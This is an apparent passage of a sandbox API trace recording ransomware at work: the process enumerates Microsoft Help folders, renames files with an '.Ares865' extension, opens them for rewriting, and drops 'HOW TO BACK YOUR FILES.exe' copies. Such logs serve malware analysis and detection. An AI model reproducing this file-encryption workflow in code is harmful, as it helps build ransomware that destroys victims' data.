-1 [0151.664] lstrcpyW (in: lpString1=0x2cce474, lpString2="1033" | out: lpString1="1033") returned="1033" [0151.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0151.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0380 [0151.664] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0151.664] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53851900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53851900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0151.664] lstrcmpiW (lpString1="1036", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.664] lstrcmpiW (lpString1="1036", lpString2="aoldtz.exe") returned -1 [0151.664] lstrcpyW (in: lpString1=0x2cce474, lpString2="1036" | out: lpString1="1036") returned="1036" [0151.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0151.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0270 [0151.664] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0151.664] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0151.664] lstrcmpiW (lpString1="1040", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.664] lstrcmpiW (lpString1="1040", lpString2="aoldtz.exe") returned -1 [0151.665] lstrcpyW (in: lpString1=0x2cce474, lpString2="1040" | out: lpString1="1040") returned="1040" [0151.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0151.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f02f8 [0151.665] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0151.665] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0151.665] lstrcmpiW (lpString1="1041", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.665] lstrcmpiW (lpString1="1041", lpString2="aoldtz.exe") returned -1 [0151.665] lstrcpyW (in: lpString1=0x2cce474, lpString2="1041" | out: lpString1="1041") returned="1041" [0151.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0151.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0160 [0151.665] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0151.665] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1042", cAlternateFileName="")) returned 1 [0151.665] lstrcmpiW (lpString1="1042", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.665] lstrcmpiW (lpString1="1042", lpString2="aoldtz.exe") returned -1 [0151.665] lstrcpyW (in: lpString1=0x2cce474, lpString2="1042" | out: lpString1="1042") returned="1042" [0151.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0151.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f01e8 [0151.665] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0151.665] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53805640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53805640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0151.665] lstrcmpiW (lpString1="1046", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.666] lstrcmpiW (lpString1="1046", lpString2="aoldtz.exe") returned -1 [0151.666] lstrcpyW (in: lpString1=0x2cce474, lpString2="1046" | out: lpString1="1046") returned="1046" [0151.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0151.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f07c0 [0151.666] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0151.666] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53805640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53805640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0151.666] lstrcmpiW (lpString1="1049", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.666] lstrcmpiW (lpString1="1049", lpString2="aoldtz.exe") returned -1 [0151.666] lstrcpyW (in: lpString1=0x2cce474, lpString2="1049" | out: lpString1="1049") returned="1049" [0151.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0151.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0408 [0151.666] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0151.666] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537df4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537df4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0151.666] lstrcmpiW (lpString1="2052", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.666] lstrcmpiW (lpString1="2052", lpString2="aoldtz.exe") returned -1 [0151.666] lstrcpyW (in: lpString1=0x2cce474, lpString2="2052" | out: lpString1="2052") returned="2052" [0151.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0151.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0490 [0151.667] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0151.667] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537df4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537df4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0151.667] lstrcmpiW (lpString1="3082", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.667] lstrcmpiW (lpString1="3082", lpString2="aoldtz.exe") returned -1 [0151.667] lstrcpyW (in: lpString1=0x2cce474, lpString2="3082" | out: lpString1="3082") returned="3082" [0151.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0151.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f05a0 [0151.667] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0151.667] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x537b9380, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x537b9380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0151.667] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0151.667] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93aa2500, ftCreationTime.dwHighDateTime=0x1c9db14, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93aa2500, ftLastWriteTime.dwHighDateTime=0x1c9db14, nFileSizeHigh=0x0, nFileSizeLow=0x323, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.HxC", cAlternateFileName="")) returned 1 [0151.667] lstrcmpiW (lpString1="Hx.HxC", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0151.667] lstrcmpiW (lpString1="Hx.HxC", lpString2="aoldtz.exe") returned 1 [0151.667] lstrcpyW (in: lpString1=0x2cce474, lpString2="Hx.HxC" | out: lpString1="Hx.HxC") returned="Hx.HxC" [0151.667] lstrlenW (lpString="Hx.HxC") returned 6 [0151.667] lstrlenW (lpString="Ares865") returned 7 [0151.668] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC.Ares865") returned 72 [0151.668] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxc.ares865"), dwFlags=0x1) returned 1 [0151.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxC.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.672] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=803) returned 1 [0151.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0151.677] lstrcpyW (in: lpString1=0x2cce474, lpString2="Hx.HxT" | out: lpString1="Hx.HxT") returned="Hx.HxT" [0151.677] lstrlenW (lpString="Hx.HxT") returned 6 [0151.677] lstrlenW (lpString="Ares865") returned 7 [0151.677] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT.Ares865") returned 72 [0151.677] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxt"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxt.ares865"), dwFlags=0x1) returned 1 [0151.681] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.681] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=169) returned 1 [0151.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0151.686] lstrcpyW (in: lpString1=0x2cce474, lpString2="HxRuntime.HxS" | out: lpString1="HxRuntime.HxS") returned="HxRuntime.HxS" [0151.686] lstrlenW (lpString="HxRuntime.HxS") returned 13 [0151.686] lstrlenW (lpString="Ares865") returned 7 [0151.686] lstrcmpiW (lpString1="ime.HxS", lpString2="Ares865") returned 1 [0151.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS.Ares865") returned 79 [0151.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hxruntime.hxs"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hxruntime.hxs.ares865"), dwFlags=0x1) returned 1 [0151.688] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hxruntime.hxs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.688] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27886) returned 1 [0151.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.688] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0151.693] lstrcpyW (in: lpString1=0x2cce474, lpString2="Keywords.HxK" | out: lpString1="Keywords.HxK") returned="Keywords.HxK" [0151.693] lstrlenW (lpString="Keywords.HxK") returned 12 [0151.693] lstrlenW (lpString="Ares865") returned 7 [0151.693] lstrcmpiW (lpString1="rds.HxK", lpString2="Ares865") returned 1 [0151.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK.Ares865") returned 78 [0151.693] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\keywords.hxk"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\keywords.hxk.ares865"), dwFlags=0x1) returned 1 [0151.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Keywords.HxK.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\keywords.hxk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.695] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0151.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0151.702] lstrcpyW (in: lpString1=0x2cce474, lpString2="NamedURLs.HxK" | out: lpString1="NamedURLs.HxK") returned="NamedURLs.HxK" [0151.702] lstrlenW (lpString="NamedURLs.HxK") returned 13 [0151.702] lstrlenW (lpString="Ares865") returned 7 [0151.702] lstrcmpiW (lpString1="RLs.HxK", lpString2="Ares865") returned 1 [0151.702] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK.Ares865") returned 79 [0151.702] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\namedurls.hxk"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\namedurls.hxk.ares865"), dwFlags=0x1) returned 1 [0151.704] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\NamedURLs.HxK.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\namedurls.hxk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.704] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=140) returned 1 [0151.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0151.707] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" [0151.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f05a0 | out: hHeap=0x2b0000) returned 1 [0151.708] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0151.708] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned 62 [0151.708] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" [0151.708] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.708] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.708] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.709] GetLastError () returned 0x0 [0151.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.709] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.709] CloseHandle (hObject=0x120) returned 1 [0151.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.709] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.709] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537df4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537df4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.709] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.709] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.710] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.710] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.710] lstrlenW (lpString="Ares865") returned 7 [0151.710] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.Ares865") returned 81 [0151.710] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19776) returned 1 [0151.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f05a0 [0151.716] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" [0151.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0490 | out: hHeap=0x2b0000) returned 1 [0151.716] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0151.716] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned 62 [0151.716] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" [0151.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.717] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.717] GetLastError () returned 0x0 [0151.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.717] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.717] CloseHandle (hObject=0x120) returned 1 